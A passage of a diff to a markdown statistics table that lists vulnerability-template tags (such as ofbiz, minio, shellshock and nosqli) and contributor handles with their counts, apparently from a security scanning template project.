| | | | | | +| ofbiz | 6 | socketz | 2 | | | | | | | +| firmware | 6 | 0xsmiley | 2 | | | | | | | +| minio | 5 | koti2 | 2 | | | | | | | +| solarwinds | 5 | dheerajmadhukar | 2 | | | | | | | +| rfi | 5 | splint3r7 | 2 | | | | | | | +| rseenet | 5 | fabaff | 2 | | | | | | | +| fatpipe | 5 | luci | 2 | | | | | | | +| ssl | 5 | ree4pwn | 2 | | | | | | | +| symantec | 5 | sbani | 2 | | | | | | | +| setup | 5 | paradessia | 2 | | | | | | | +| leak | 5 | g4l1t0 | 2 | | | | | | | +| kubelet | 5 | bernardofsr | 2 | | | | | | | +| gocd | 5 | manas_harsh | 2 | | | | | | | +| cache | 5 | rschio | 1 | | | | | | | +| git | 5 | b0rn2r00t | 1 | | | | | | | +| node | 5 | blckraven | 1 | | | | | | | +| alibaba | 5 | borna nematzadeh | 1 | | | | | | | +| error | 5 | phyr3wall | 1 | | | | | | | +| symfony | 5 | tim_koopmans | 1 | | | | | | | +| samsung | 5 | retr02332 | 1 | | | | | | | | keycloak | 5 | whynotke | 1 | | | | | | | -| apisix | 5 | akash.c | 1 | | | | | | | -| opensis | 5 | hanlaomo | 1 | | | | | | | -| kubelet | 5 | elouhi | 1 | | | | | | | -| fatpipe | 5 | nielsing | 1 | | | | | | | -| ecology | 5 | chron0x | 1 | | | | | | | -| symfony | 5 | amnotacat | 1 | | | | | | | -| ruby | 5 | c3l3si4n | 1 | | | | | | | -| gocd | 5 | kiks7 | 1 | | | | | | | -| alibaba | 5 | pudsec | 1 | | | | | | | -| storage | 5 | shifacyclewla | 1 | | | | | | | -| circarlife | 5 | luskabol | 1 | | | | | | | -| dedecms | 5 | nerrorsec | 1 | | | | | | | -| thinkphp | 5 | push4d | 1 | | | | | | | -| buffalo | 4 | thebinitghimire | 1 | | | | | | | -| springcloud | 4 | thezakman | 1 | | | | | | | -| flink | 4 | igibanez | 1 | | | | | | | -| terramaster | 4 | mah3sec_ | 1 | | | | | | | -| couchdb | 4 | makyotox | 1 | | | | | | | -| websphere | 4 | bughuntersurya | 1 | | | | | | | -| stripe | 4 | yashanand155 | 1 | | | | | | | -| voip | 4 | yavolo | 1 | | | | | | | -| smtp | 4 | ivo palazzolo (@palaziv) | 1 | | | | | | | -| microstrategy | 4 | fq_hsu | 1 | | | | | | | -| cacti | 4 | jbaines-r7 | 1 | | | | | | | -| awstats | 4 | micha3lb3n | 1 | | | | | | | -| nexus | 4 | wlayzz | 1 | | | | | | | -| db | 4 | s1r1u5_ | 1 | | | | | | | -| caucho | 4 | noobexploiter | 1 | | | | | | | -| resin | 4 | schniggie | 1 | | | | | | | -| prestashop | 4 | bernardo rodrigues | 1 | | | | | | | +| circarlife | 5 | jiheon-dev | 1 | | | | | | | +| strapi | 5 | revblock | 1 | | | | | | | +| dedecms | 5 | dievus | 1 | | | | | | | +| thinkphp | 5 | bibeksapkota (sar00n) | 1 | | | | | | | +| microweber | 5 | bartu utku sarp | 1 | | | | | | | +| ruby | 5 | brabbit10 | 1 | | | | | | | +| apisix | 5 | akshansh | 1 | | | | | | | +| ecology | 5 | xstp | 1 | | | | | | | +| storage | 5 | kurohost | 1 | | | | | | | +| opensis | 5 | juicypotato1 | 1 | | | | | | | +| moodle | 5 | tirtha_mandal | 1 | | | | | | | +| icewarp | 5 | chron0x | 1 | | | | | | | +| metinfo | 5 | 0xceba | 1 | | | | | | | +| zhiyuan | 5 | bughuntersurya | 1 | | | | | | | +| artica | 5 | patralos | 1 | | | | | | | +| puppet | 4 | 3th1c_yuk1 | 1 | | | | | | | +| jellyfin | 4 | compr00t | 1 | | | | | | | +| awstats | 4 | luqman | 1 | | | | | | | +| npm | 4 | intx0x80 | 1 | | | | | | | +| microstrategy | 4 | 2rs3c | 1 | | | | | | | +| activemq | 4 | kareemse1im | 1 | | | | | | | +| sonarqube | 4 | wabafet | 1 | | | | | | | +| flink | 4 | zandros0 | 1 | | | | | | | +| plesk | 4 | mrcl0wnlab | 1 | | | | | | | +| gogs | 4 | furkansayim | 1 | | | | | | | +| elastic | 4 | opencirt | 1 | | | | | | | +| cve2007 | 4 | daffianfo | 1 | | | | | | | +| search | 4 | alevsk | 1 | | | | | | | +| hpe | 4 | sec_hawk | 1 | | | | | | | +| cloud | 4 | francescocarlucci | 1 | | | | | | | +| couchdb | 4 | 0xteles | 1 | | | | | | | +| springcloud | 4 | flag007 | 1 | | | | | | | +| kibana | 4 | berkdusunur | 1 | | | | | | | +| ssh | 4 | th3.d1p4k | 1 | | | | | | | +| smtp | 4 | 0xtavian | 1 | | | | | | | +| resin | 4 | aaronchen0 | 1 | | | | | | | +| stripe | 4 | evolutionsec | 1 | | | | | | | +| hongdian | 4 | hexcat | 1 | | | | | | | +| voip | 4 | jbaines-r7 | 1 | | | | | | | +| adminer | 4 | veshraj | 1 | | | | | | | +| artifactory | 4 | anon-artist | 1 | | | | | | | +| cockpit | 4 | kailashbohara | 1 | | | | | | | +| asp | 4 | f1she3 | 1 | | | | | | | +| prestashop | 4 | nielsing | 1 | | | | | | | +| caucho | 4 | zsusac | 1 | | | | | | | +| nexus | 4 | sicksec | 1 | | | | | | | +| photo | 4 | elouhi | 1 | | | | | | | +| cnvd2019 | 4 | hanlaomo | 1 | | | | | | | +| paypal | 4 | evan rubinstien | 1 | | | | | | | +| hikvision | 4 | nerrorsec | 1 | | | | | | | +| kevinlab | 4 | 0xh7ml | 1 | | | | | | | +| oa | 4 | higor melgaço (eremit4) | 1 | | | | | | | +| hoteldruid | 4 | igibanez | 1 | | | | | | | +| mongodb | 4 | duty_1g | 1 | | | | | | | +| ognl | 4 | bernardo rodrigues | 1 | | | | | | | +| | | @bernardofsr | | | | | | | | +| websphere | 4 | rubina119 | 1 | | | | | | | +| db | 4 | majidmc2 | 1 | | | | | | | +| xmlrpc | 4 | yuansec | 1 | | | | | | | +| buffalo | 4 | elder tao | 1 | | | | | | | +| beyondtrust | 4 | jeya.seelan | 1 | | | | | | | +| tikiwiki | 4 | exid | 1 | | | | | | | +| panos | 4 | ofjaaah | 1 | | | | | | | +| mailchimp | 4 | jrolf | 1 | | | | | | | +| zyxel | 4 | pudsec | 1 | | | | | | | +| wcs | 4 | un-fmunozs | 1 | | | | | | | +| thinkcmf | 4 | makyotox | 1 | | | | | | | +| jetbrains | 4 | d0rkerdevil | 1 | | | | | | | +| terramaster | 4 | mesaglio | 1 | | | | | | | +| aspose | 4 | _c0wb0y_ | 1 | | | | | | | +| cacti | 4 | manasmbellani | 1 | | | | | | | +| database | 3 | momen eldawakhly | 1 | | | | | | | +| movable | 3 | aceseven (digisec360) | 1 | | | | | | | +| sendgrid | 3 | arall | 1 | | | | | | | +| mongo | 3 | amnotacat | 1 | | | | | | | +| javascript | 3 | kba@sogeti_esec | 1 | | | | | | | +| jfrog | 3 | daviey | 1 | | | | | | | +| dreambox | 3 | kaizensecurity | 1 | | | | | | | +| kentico | 3 | push4d | 1 | | | | | | | +| jeesns | 3 | adrianmf | 1 | | | | | | | +| httpd | 3 | aaron_costello | 1 | | | | | | | +| | | (@conspiracyproof) | | | | | | | | +| thinfinity | 3 | apt-mirror | 1 | | | | | | | +| log | 3 | sherlocksecurity | 1 | | | | | | | +| cisa | 3 | petruknisme | 1 | | | | | | | +| nosqli | 3 | dhiyaneshdki | 1 | | | | | | | +| fanruan | 3 | 0xceeb | 1 | | | | | | | +| sugarcrm | 3 | ivo palazzolo (@palaziv) | 1 | | | | | | | +| netlify | 3 | sickwell | 1 | | | | | | | +| jamf | 3 | x6263 | 1 | | | | | | | +| linkerd | 3 | prettyboyaaditya | 1 | | | | | | | +| trendnet | 3 | droberson | 1 | | | | | | | +| epson | 3 | v0idc0de | 1 | | | | | | | +| openssh | 3 | philippdelteil | 1 | | | | | | | +| phppgadmin | 3 | ok_bye_now | 1 | | | | | | | +| actuator | 3 | knassar702 | 1 | | | | | | | +| ampps | 3 | alperenkesk | 1 | | | | | | | +| redis | 3 | florianmaak | 1 | | | | | | | +| hashicorp | 3 | coldfish | 1 | | | | | | | +| square | 3 | osamahamad | 1 | | | | | | | +| axis2 | 3 | omarkurt | 1 | | | | | | | +| 3cx | 3 | fopina | 1 | | | | | | | +| heroku | 3 | ggranjus | 1 | | | | | | | +| vbulletin | 3 | wlayzz | 1 | | | | | | | +| oauth | 3 | sid ahmed malaoui @ realistic | 1 | | | | | | | +| | | security | | | | | | | | +| nuuo | 3 | narluin | 1 | | | | | | | +| vrealize | 3 | infosecsanyam | 1 | | | | | | | +| centos | 3 | exceed | 1 | | | | | | | +| prtg | 3 | thebinitghimire | 1 | | | | | | | +| sharepoint | 3 | orpheus | 1 | | | | | | | +| fuelcms | 3 | schniggie | 1 | | | | | | | +| subrion | 3 | skylark-lab | 1 | | | | | | | +| synology | 3 | p-l- | 1 | | | | | | | +| mcafee | 3 | gboddin | 1 | | | | | | | +| empirecms | 3 | streetofhackerr007 | 1 | | | | | | | +| voipmonitor | 3 | brenocss | 1 | | | | | | | +| nacos | 3 | notsoevilweasel | 1 | | | | | | | +| dos | 3 | b4uh0lz | 1 | | | | | | | +| seeyon | 3 | mhdsamx | 1 | | | | | | | +| elfinder | 3 | rodnt | 1 | | | | | | | +| bitrix | 3 | udyz | 1 | | | | | | | +| ems | 3 | bad5ect0r | 1 | | | | | | | +| kingsoft | 3 | ipanda | 1 | | | | | | | +| splunk | 3 | s1r1u5_ | 1 | | | | | | | +| panabit | 3 | thevillagehacker | 1 | | | | | | | +| axis | 3 | ooooooo_q | 1 | | | | | | | +| dolibarr | 3 | cookiehanhoan | 1 | | | | | | | +| selea | 3 | fq_hsu | 1 | | | | | | | +| geowebserver | 3 | jeya seelan | 1 | | | | | | | +| fortios | 3 | j3ssie/geraldino2 | 1 | | | | | | | +| pentaho | 3 | lark lab | 1 | | | | | | | +| linkedin | 3 | c3l3si4n | 1 | | | | | | | +| bruteforce | 3 | _harleo | 1 | | | | | | | +| sql | 3 | oscarintherocks | 1 | | | | | | | +| axigen | 3 | micha3lb3n | 1 | | | | | | | +| aptus | 3 | streetofhackerr007 (rohit | 1 | | | | | | | +| | | soni) | | | | | | | | +| webadmin | 3 | j33n1k4 | 1 | | | | | | | +| globalprotect | 3 | miroslavsotak | 1 | | | | | | | +| httpbin | 3 | zhenwarx | 1 | | | | | | | +| consul | 3 | justmumu | 1 | | | | | | | +| ebs | 3 | exploitation | 1 | | | | | | | +| phpinfo | 3 | co0nan | 1 | | | | | | | +| samba | 3 | kishore krishna (sillydaddy) | 1 | | | | | | | +| facebook | 3 | manuelbua | 1 | | | | | | | +| openam | 3 | ilovebinbash | 1 | | | | | | | +| telerik | 3 | bernardo rodrigues | 1 | | | | | | | | | | @bernardofsr | andré monteiro | | | | | | | | | | | @am0nt31r0 | | | | | | | | -| search | 4 | affix | 1 | | | | | | | -| mongodb | 4 | aaron_costello | 1 | | | | | | | -| | | (@conspiracyproof) | | | | | | | | -| xmlrpc | 4 | narluin | 1 | | | | | | | -| jetbrains | 4 | opencirt | 1 | | | | | | | -| cnvd2019 | 4 | fopina | 1 | | | | | | | -| puppet | 4 | sickwell | 1 | | | | | | | -| cockpit | 4 | 0xd0ff9 | 1 | | | | | | | -| tikiwiki | 4 | berkdusunur | 1 | | | | | | | -| ognl | 4 | ahmetpergamum | 1 | | | | | | | -| activemq | 4 | _harleo | 1 | | | | | | | -| artifactory | 4 | pratik khalane | 1 | | | | | | | -| thinkcmf | 4 | rschio | 1 | | | | | | | -| oa | 4 | mesaglio | 1 | | | | | | | -| jellyfin | 4 | zandros0 | 1 | | | | | | | -| adminer | 4 | compr00t | 1 | | | | | | | -| wcs | 4 | aresx | 1 | | | | | | | -| cve2007 | 4 | ilovebinbash | 1 | | | | | | | -| asp | 4 | udyz | 1 | | | | | | | -| aspose | 4 | act1on3 | 1 | | | | | | | -| hongdian | 4 | retr02332 | 1 | | | | | | | -| photo | 4 | regala_ | 1 | | | | | | | -| hikvision | 4 | qlkwej | 1 | | | | | | | -| paypal | 4 | kurohost | 1 | | | | | | | -| kevinlab | 4 | shelld3v | 1 | | | | | | | -| hoteldruid | 4 | ahmed sherif | 1 | | | | | | | -| panos | 4 | thevillagehacker | 1 | | | | | | | -| mailchimp | 4 | soyelmago | 1 | | | | | | | -| zyxel | 4 | dievus | 1 | | | | | | | -| ssh | 4 | flag007 | 1 | | | | | | | -| gogs | 4 | mubassirpatel | 1 | | | | | | | -| hpe | 4 | osamahamad | 1 | | | | | | | -| cloud | 4 | kailashbohara | 1 | | | | | | | -| elastic | 4 | brabbit10 | 1 | | | | | | | -| sonarqube | 4 | petruknisme | 1 | | | | | | | -| npm | 4 | philippdelteil | 1 | | | | | | | -| kibana | 4 | bad5ect0r | 1 | | | | | | | -| plesk | 4 | arall | 1 | | | | | | | -| beyondtrust | 4 | undefl0w | 1 | | | | | | | -| elfinder | 3 | b0rn2r00t | 1 | | | | | | | -| synology | 3 | sid ahmed malaoui @ realistic | 1 | | | | | | | -| | | security | | | | | | | | -| rlm | 3 | sherlocksecurity | 1 | | | | | | | -| phpinfo | 3 | 0ut0fb4nd | 1 | | | | | | | -| centos | 3 | noamrathaus | 1 | | | | | | | -| openssh | 3 | retr0 | 1 | | | | | | | -| ebs | 3 | andysvints | 1 | | | | | | | -| circleci | 3 | shreyapohekar | 1 | | | | | | | -| exposures | 3 | xshuden | 1 | | | | | | | -| axis | 3 | 3th1c_yuk1 | 1 | | | | | | | -| square | 3 | justmumu | 1 | | | | | | | -| 3cx | 3 | hexcat | 1 | | | | | | | -| jeesns | 3 | charanrayudu | 1 | | | | | | | -| sharepoint | 3 | alex | 1 | | | | | | | -| empirecms | 3 | skylark-lab | 1 | | | | | | | -| linkerd | 3 | miroslavsotak | 1 | | | | | | | -| odoo | 3 | evan rubinstien | 1 | | | | | | | -| aptus | 3 | co0nan | 1 | | | | | | | -| vrealize | 3 | x6263 | 1 | | | | | | | -| jfrog | 3 | juicypotato1 | 1 | | | | | | | -| hashicorp | 3 | toufik-airane | 1 | | | | | | | -| webadmin | 3 | phyr3wall | 1 | | | | | | | -| movable | 3 | pdp | 1 | | | | | | | -| subrion | 3 | yuansec | 1 | | | | | | | -| lotus | 3 | ooooooo_q | 1 | | | | | | | -| actuator | 3 | iampritam | 1 | | | | | | | -| trixbox | 3 | borna nematzadeh | 1 | | | | | | | -| selea | 3 | sec_hawk | 1 | | | | | | | -| netlify | 3 | jas37 | 1 | | | | | | | -| fanruan | 3 | patralos | 1 | | | | | | | -| oauth | 3 | zsusac | 1 | | | | | | | -| dos | 3 | dawid-czarnecki | 1 | | | | | | | -| heroku | 3 | rodnt | 1 | | | | | | | -| axis2 | 3 | mhdsamx | 1 | | | | | | | -| telerik | 3 | matthew nickerson (b0than) @ | 1 | | | | | | | +| concrete | 3 | alex | 1 | | | | | | | +| sophos | 3 | andysvints | 1 | | | | | | | +| rlm | 3 | absshax | 1 | | | | | | | +| workspaceone | 3 | furkansenan | 1 | | | | | | | +| zeroshell | 3 | pratik khalane | 1 | | | | | | | +| glassfish | 3 | jteles | 1 | | | | | | | +| odoo | 3 | affix | 1 | | | | | | | +| trixbox | 3 | ahmetpergamum | 1 | | | | | | | +| horizon | 3 | retr0 | 1 | | | | | | | +| messaging | 3 | remi gascou (podalirius) | 1 | | | | | | | +| seagate | 3 | thezakman | 1 | | | | | | | +| postmessage | 3 | myztique | 1 | | | | | | | +| circleci | 3 | luskabol | 1 | | | | | | | +| lansweeper | 3 | ahmed abou-ela | 1 | | | | | | | +| lotus | 3 | ahmed sherif | 1 | | | | | | | +| targa | 3 | ringo | 1 | | | | | | | +| wordfence | 3 | xshuden | 1 | | | | | | | +| grav | 3 | 0xd0ff9 | 1 | | | | | | | +| smb | 3 | mah3sec_ | 1 | | | | | | | +| openemr | 3 | twitter.com/dheerajmadhukar | 1 | | | | | | | +| graph | 3 | ldionmarcil | 1 | | | | | | | +| openbmcs | 3 | official_blackhat13 | 1 | | | | | | | +| exposures | 3 | dawid-czarnecki | 1 | | | | | | | +| linksys | 3 | kabirsuda | 1 | | | | | | | +| accela | 2 | _darrenmartyn | 1 | | | | | | | +| code42 | 2 | fmunozs | 1 | | | | | | | +| rackstation | 2 | husain | 1 | | | | | | | +| intercom | 2 | manikanta a.k.a @secureitmania | 1 | | | | | | | +| rocketchat | 2 | tea | 1 | | | | | | | +| ambari | 2 | nytr0gen | 1 | | | | | | | +| neos | 2 | deena | 1 | | | | | | | +| akamai | 2 | xeldax | 1 | | | | | | | +| phpstorm | 2 | undefl0w | 1 | | | | | | | +| orchid | 2 | 0xrod | 1 | | | | | | | +| cloudflare | 2 | arr0way | 1 | | | | | | | +| digitalrebar | 2 | akash.c | 1 | | | | | | | +| gitbook | 2 | geraldino2 | 1 | | | | | | | +| rancher | 2 | hakluke | 1 | | | | | | | +| rackn | 2 | yavolo | 1 | | | | | | | +| webcam | 2 | mass0ma | 1 | | | | | | | +| watchguard | 2 | 0h1in9e | 1 | | | | | | | +| jitsi | 2 | noamrathaus | 1 | | | | | | | +| cloudinary | 2 | notnotnotveg | 1 | | | | | | | +| smartstore | 2 | b0yd | 1 | | | | | | | +| bomgar | 2 | pdp | 1 | | | | | | | +| avaya | 2 | mubassirpatel | 1 | | | | | | | +| gespage | 2 | thesubtlety | 1 | | | | | | | +| gradle | 2 | sshell | 1 | | | | | | | +| redash | 2 | harshinsecurity | 1 | | | | | | | +| wuzhicms | 2 | clarkvoss | 1 | | | | | | | +| jsf | 2 | shreyapohekar | 1 | | | | | | | +| twitter | 2 | remonsec | 1 | | | | | | | +| gitea | 2 | qlkwej | 1 | | | | | | | +| livezilla | 2 | shifacyclewla | 1 | | | | | | | +| ixcache | 2 | izn0u | 1 | | | | | | | +| arcgis | 2 | charanrayudu | 1 | | | | | | | +| servicenow | 2 | luqmaan hadia | 1 | | | | | | | +| auerswald | 2 | noobexploiter | 1 | | | | | | | +| thruk | 2 | soyelmago | 1 | | | | | | | +| waf | 2 | iampritam | 1 | | | | | | | +| jmx | 2 | aresx | 1 | | | | | | | +| bmc | 2 | ratnadip gajbhiye | 1 | | | | | | | +| igs | 2 | becivells | 1 | | | | | | | +| horde | 2 | bjhulst | 1 | | | | | | | +| apollo | 2 | regala_ | 1 | | | | | | | +| proftpd | 2 | shelld3v | 1 | | | | | | | +| wooyun | 2 | willd96 | 1 | | | | | | | +| konga | 2 | rojanrijal | 1 | | | | | | | +| flightpath | 2 | andirrahmani1 | 1 | | | | | | | +| ecoa | 2 | matthew nickerson (b0than) @ | 1 | | | | | | | | | | layer 8 security | | | | | | | | -| voipmonitor | 3 | j33n1k4 | 1 | | | | | | | -| log | 3 | 0xceba | 1 | | | | | | | -| httpd | 3 | 0xh7ml | 1 | | | | | | | -| workspaceone | 3 | streetofhackerr007 (rohit | 1 | | | | | | | -| | | soni) | | | | | | | | -| seagate | 3 | d0rkerdevil | 1 | | | | | | | -| targa | 3 | jteles | 1 | | | | | | | -| samba | 3 | akshansh | 1 | | | | | | | -| wordfence | 3 | apt-mirror | 1 | | | | | | | -| redis | 3 | ok_bye_now | 1 | | | | | | | -| ampps | 3 | vzamanillo | 1 | | | | | | | -| splunk | 3 | breno_css | 1 | | | | | | | -| glassfish | 3 | absshax | 1 | | | | | | | -| axigen | 3 | kabirsuda | 1 | | | | | | | -| openam | 3 | gboddin | 1 | | | | | | | -| cisa | 3 | notsoevilweasel | 1 | | | | | | | -| linksys | 3 | kareemse1im | 1 | | | | | | | -| openemr | 3 | duty_1g | 1 | | | | | | | -| prtg | 3 | higor melgaço (eremit4) | 1 | | | | | | | -| sendgrid | 3 | daviey | 1 | | | | | | | -| pentaho | 3 | official_blackhat13 | 1 | | | | | | | -| nacos | 3 | ipanda | 1 | | | | | | | -| mongo | 3 | kaizensecurity | 1 | | | | | | | -| dreambox | 3 | knassar702 | 1 | | | | | | | -| jamf | 3 | f1she3 | 1 | | | | | | | -| consul | 3 | prettyboyaaditya | 1 | | | | | | | -| grav | 3 | ringo | 1 | | | | | | | -| kentico | 3 | bjhulst | 1 | | | | | | | -| fortios | 3 | geraldino2 | 1 | | | | | | | -| trendnet | 3 | manasmbellani | 1 | | | | | | | -| dolibarr | 3 | xeldax | 1 | | | | | | | -| httpbin | 3 | omarkurt | 1 | | | | | | | -| bruteforce | 3 | alevsk | 1 | | | | | | | -| postmessage | 3 | wabafet | 1 | | | | | | | -| facebook | 3 | veshraj | 1 | | | | | | | -| concrete | 3 | bernardo rodrigues | 1 | | | | | | | -| | | @bernardofsr | | | | | | | | -| sophos | 3 | blckraven | 1 | | | | | | | -| graph | 3 | clarkvoss | 1 | | | | | | | -| lansweeper | 3 | zinminphy0 | 1 | | | | | | | -| mcafee | 3 | bibeksapkota (sar00n) | 1 | | | | | | | -| seeyon | 3 | anon-artist | 1 | | | | | | | -| nosqli | 3 | d4vy | 1 | | | | | | | -| horizon | 3 | manuelbua | 1 | | | | | | | -| fuelcms | 3 | coldfish | 1 | | | | | | | -| zeroshell | 3 | luqmaan hadia | 1 | | | | | | | -| smb | 3 | dhiyaneshdki | 1 | | | | | | | -| bitrix | 3 | jrolf | 1 | | | | | | | -| phppgadmin | 3 | rubina119 | 1 | | | | | | | -| javascript | 3 | mass0ma | 1 | | | | | | | -| ems | 3 | yashgoti | 1 | | | | | | | -| linkedin | 3 | 0h1in9e | 1 | | | | | | | -| thinfinity | 3 | 0xtavian | 1 | | | | | | | -| sugarcrm | 3 | tea | 1 | | | | | | | -| nuuo | 3 | deena | 1 | | | | | | | -| epson | 3 | remi gascou (podalirius) | 1 | | | | | | | -| kingsoft | 3 | un-fmunozs | 1 | | | | | | | -| database | 3 | p-l- | 1 | | | | | | | -| sql | 3 | jeya.seelan | 1 | | | | | | | -| geowebserver | 3 | j3ssie/geraldino2 | 1 | | | | | | | -| openbmcs | 3 | majidmc2 | 1 | | | | | | | -| vbulletin | 3 | ldionmarcil | 1 | | | | | | | -| globalprotect | 3 | ofjaaah | 1 | | | | | | | -| messaging | 3 | florianmaak | 1 | | | | | | | -| homematic | 2 | v0idc0de | 1 | | | | | | | -| projectsend | 2 | th3.d1p4k | 1 | | | | | | | -| docs | 2 | furkansayim | 1 | | | | | | | -| places | 2 | sshell | 1 | | | | | | | -| shenyu | 2 | 0xrod | 1 | | | | | | | -| motorola | 2 | myztique | 1 | | | | | | | -| weather | 2 | xstp | 1 | | | | | | | -| exacqvision | 2 | twitter.com/dheerajmadhukar | 1 | | | | | | | -| graphite | 2 | mrcl0wnlab | 1 | | | | | | | -| nasos | 2 | exploitation | 1 | | | | | | | -| jquery | 2 | nytr0gen | 1 | | | | | | | -| proftpd | 2 | 2rs3c | 1 | | | | | | | -| plastic | 2 | daffianfo | 1 | | | | | | | -| wuzhicms | 2 | elmahdi | 1 | | | | | | | -| ericsson | 2 | ratnadip gajbhiye | 1 | | | | | | | -| hasura | 2 | cookiehanhoan | 1 | | | | | | | -| codeigniter | 2 | kba@sogeti_esec | 1 | | | | | | | -| ruckus | 2 | revblock | 1 | | | | | | | -| dotcms | 2 | lethargynavigator | 1 | | | | | | | -| smartstore | 2 | evolutionsec | 1 | | | | | | | -| traefik | 2 | droberson | 1 | | | | | | | -| jitsi | 2 | becivells | 1 | | | | | | | -| saltstack | 2 | rojanrijal | 1 | | | | | | | -| rstudio | 2 | andirrahmani1 | 1 | | | | | | | -| intercom | 2 | exceed | 1 | | | | | | | -| kong | 2 | adrianmf | 1 | | | | | | | -| appcms | 2 | streetofhackerr007 | 1 | | | | | | | -| pulse | 2 | manikanta a.k.a @secureitmania | 1 | | | | | | | -| sidekiq | 2 | jiheon-dev | 1 | | | | | | | -| code42 | 2 | exid | 1 | | | | | | | -| apollo | 2 | _darrenmartyn | 1 | | | | | | | -| thruk | 2 | notnotnotveg | 1 | | | | | | | -| globaldomains | 2 | infosecsanyam | 1 | | | | | | | -| gitbook | 2 | francescocarlucci | 1 | | | | | | | -| erxes | 2 | tirtha_mandal | 1 | | | | | | | -| middleware | 2 | brenocss | 1 | | | | | | | -| node-red-dashboard | 2 | orpheus | 1 | | | | | | | -| itop | 2 | b0yd | 1 | | | | | | | -| owasp | 2 | aaronchen0 | 1 | | | | | | | -| waf | 2 | jeya seelan | 1 | | | | | | | -| emqx | 2 | 0xteles | 1 | | | | | | | -| zerof | 2 | aceseven (digisec360) | 1 | | | | | | | -| netflix | 2 | fmunozs | 1 | | | | | | | -| cloudinary | 2 | rotemreiss | 1 | | | | | | | -| avtech | 2 | furkansenan | 1 | | | | | | | -| akkadian | 2 | zhenwarx | 1 | | | | | | | -| mailgun | 2 | harshinsecurity | 1 | | | | | | | -| zzzcms | 2 | 0xceeb | 1 | | | | | | | -| pcoip | 2 | arr0way | 1 | | | | | | | -| netsus | 2 | bartu utku sarp | 1 | | | | | | | -| linux | 2 | _c0wb0y_ | 1 | | | | | | | -| dotnetnuke | 2 | alperenkesk | 1 | | | | | | | -| gitlist | 2 | remonsec | 1 | | | | | | | -| arcgis | 2 | alexrydzak | 1 | | | | | | | -| netscaler | 2 | ahmed abou-ela | 1 | | | | | | | -| wamp | 2 | oscarintherocks | 1 | | | | | | | -| yii | 2 | elder tao | 1 | | | | | | | -| pega | 2 | sicksec | 1 | | | | | | | -| ad | 2 | momen eldawakhly | 1 | | | | | | | -| phpcollab | 2 | ohlinge | 1 | | | | | | | -| clusterengine | 2 | intx0x80 | 1 | | | | | | | -| natshell | 2 | luqman | 1 | | | | | | | -| harbor | 2 | ggranjus | 1 | | | | | | | -| zte | 2 | willd96 | 1 | | | | | | | -| seacms | 2 | | | | | | | | | -| labkey | 2 | | | | | | | | | -| pacsone | 2 | | | | | | | | | -| versa | 2 | | | | | | | | | -| webcam | 2 | | | | | | | | | -| key | 2 | | | | | | | | | -| metabase | 2 | | | | | | | | | -| ambari | 2 | | | | | | | | | -| metersphere | 2 | | | | | | | | | -| gespage | 2 | | | | | | | | | -| password | 2 | | | | | | | | | -| rocketchat | 2 | | | | | | | | | -| tidb | 2 | | | | | | | | | -| nagios | 2 | | | | | | | | | -| rackn | 2 | | | | | | | | | -| checkpoint | 2 | | | | | | | | | -| shellshock | 2 | | | | | | | | | -| hubspot | 2 | | | | | | | | | -| pbootcms | 2 | | | | | | | | | -| xerox | 2 | | | | | | | | | -| spark | 2 | | | | | | | | | -| dynamicweb | 2 | | | | | | | | | -| avaya | 2 | | | | | | | | | -| forcepoint | 2 | | | | | | | | | -| detect | 2 | | | | | | | | | -| maian | 2 | | | | | | | | | -| chyrp | 2 | | | | | | | | | -| kiwitcms | 2 | | | | | | | | | +| syslog | 2 | act1on3 | 1 | | | | | | | +| embed | 2 | zinminphy0 | 1 | | | | | | | +| filemanager | 2 | clment cruchet | 1 | | | | | | | +| casdoor | 2 | breno_css | 1 | | | | | | | +| tenda | 2 | elmahdi | 1 | | | | | | | +| owasp | 2 | alexrydzak | 1 | | | | | | | +| nasos | 2 | toufik-airane | 1 | | | | | | | +| domxss | 2 | yashanand155 | 1 | | | | | | | +| gitlist | 2 | vzamanillo | 1 | | | | | | | +| flir | 2 | ohlinge | 1 | | | | | | | +| bitly | 2 | kiks7 | 1 | | | | | | | +| openstack | 2 | yashgoti | 1 | | | | | | | +| frp | 2 | 0ut0fb4nd | 1 | | | | | | | +| idea | 2 | tirtha | 1 | | | | | | | +| gophish | 2 | lethargynavigator | 1 | | | | | | | +| pascom | 2 | d4vy | 1 | | | | | | | +| metabase | 2 | jas37 | 1 | | | | | | | +| dvwa | 2 | rotemreiss | 1 | | | | | | | +| zzzcms | 2 | | | | | | | | | +| backups | 2 | | | | | | | | | +| tongda | 2 | | | | | | | | | +| pega | 2 | | | | | | | | | +| jeedom | 2 | | | | | | | | | +| netflix | 2 | | | | | | | | | +| rstudio | 2 | | | | | | | | | | pgadmin | 2 | | | | | | | | | +| traefik | 2 | | | | | | | | | +| idrac | 2 | | | | | | | | | +| ranger | 2 | | | | | | | | | +| motorola | 2 | | | | | | | | | +| yii | 2 | | | | | | | | | +| password | 2 | | | | | | | | | +| sdwan | 2 | | | | | | | | | +| totemomail | 2 | | | | | | | | | +| shenyu | 2 | | | | | | | | | +| resourcespace | 2 | | | | | | | | | +| hadoop | 2 | | | | | | | | | +| forcepoint | 2 | | | | | | | | | +| key | 2 | | | | | | | | | +| hiveos | 2 | | | | | | | | | +| sangfor | 2 | | | | | | | | | +| checkpoint | 2 | | | | | | | | | +| metersphere | 2 | | | | | | | | | +| weather | 2 | | | | | | | | | +| saltstack | 2 | | | | | | | | | +| akkadian | 2 | | | | | | | | | +| commax | 2 | | | | | | | | | +| spark | 2 | | | | | | | | | +| cve2006 | 2 | | | | | | | | | +| matrix | 2 | | | | | | | | | +| virtualui | 2 | | | | | | | | | +| lantronix | 2 | | | | | | | | | +| pfsense | 2 | | | | | | | | | +| otobo | 2 | | | | | | | | | +| fortiweb | 2 | | | | | | | | | +| rabbitmq | 2 | | | | | | | | | +| hubspot | 2 | | | | | | | | | +| favicon | 2 | | | | | | | | | +| openwrt | 2 | | | | | | | | | +| zblogphp | 2 | | | | | | | | | +| shellshock | 2 | | | | | | | | | +| zte | 2 | | | | | | | | | +| typo3 | 2 | | | | | | | | | +| mida | 2 | | | | | | | | | +| impresscms | 2 | | | | | | | | | +| docs | 2 | | | | | | | | | +| cocoon | 2 | | | | | | | | | +| frontpage | 2 | | | | | | | | | +| apereo | 2 | | | | | | | | | +| emerge | 2 | | | | | | | | | +| hostheader-injection | 2 | | | | | | | | | +| exacqvision | 2 | | | | | | | | | +| avtech | 2 | | | | | | | | | +| sidekiq | 2 | | | | | | | | | +| chiyu | 2 | | | | | | | | | | alfresco | 2 | | | | | | | | | -| cgi | 2 | | | | | | | | | -| syslog | 2 | | | | | | | | | -| airtame | 2 | | | 